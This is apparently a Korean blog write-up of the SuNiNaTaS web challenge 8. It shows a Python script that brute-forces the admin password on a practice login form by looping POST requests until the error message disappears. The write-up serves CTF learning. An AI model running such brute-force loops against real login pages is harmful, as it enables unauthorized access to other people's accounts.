로그인 창이 하나가 있다. 소스 코드를 보면 아래와 같은 힌트가 있다.
<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->
admin으로 로그인하고 Password의 범위는 0~9999인가보다.
개발자 도구의 네트워크 창으로 확인해보니 요청 메소드가 POST이다. 이를 이용하여 파이썬 코드를 짤 수 있다.
import requests
session1 = requests.Session()
for i in range(100000):
data = {"id": "admin", "pw": i}
req = session1.post("http://suninatas.com/challenge/web08/web08.asp", data=data)
if (req.text.find("Password Incorrect!") == -1 ) :
print(i)
exit (0)
else:
print("finding...")비밀번호의 숫자 범위를 알려줘서 부르트포스 방법으로 풀 수 있었다.
id에 admin을 넣고 비밀번호에 획득한 숫자를 넣으면 AuthKey를 획득할 수 있다.
'해킹 및 보안 > Suninatas' 카테고리의 다른 글
| Suninatas(써니나타스) challenge 5 / Web (0) | 2022.08.22 |
|---|---|
| Suninatas(써니나타스) challenge4 / Web (0) | 2022.08.22 |
| Suninatas(써니나타스) challenge3 / Web (0) | 2022.08.22 |
| Suninatas(써니나타스) challenge 2 / Web (0) | 2022.08.22 |
| Suninatas(써니나타스) challenge 1/Web (0) | 2022.08.22 |
